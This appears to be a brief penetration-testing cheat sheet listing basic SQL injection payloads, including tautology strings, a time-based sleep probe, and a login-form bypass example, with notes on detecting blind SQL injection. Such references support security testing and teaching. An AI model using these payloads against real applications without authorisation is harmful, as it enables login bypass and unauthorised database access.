Skip to content

Basic SQLi Payloads

Test for presence of SQLi

'
' or 1=1-- -
a' or 1=1-- -
' or 1=2-- -
a' or 1=2-- -
1 or 1=2-- -
' UNION SELECT sleep(5)-- -

Blind SQLi

There is no SQL output (errors) displayed to detect the presence of SQLi.

SQLi is detected by observing the behavior of the web application when it occurs.

Compare the website behavior when inputting a valid vs invalid sql query.

Valid SQLi payload queries

Examples of SQLi payloads that should cause the SQL query to be a valid query. 

' or 1=1

Login page SQLi example
username:' or 1=1 & Password: Anything

Invalid SQLi payload queries

Examples of SQLi payloads that should cause the SQL query to be an invalid query. 

' or 1=2

Login page SQLi example
username:' or 1=2 & Password: Anything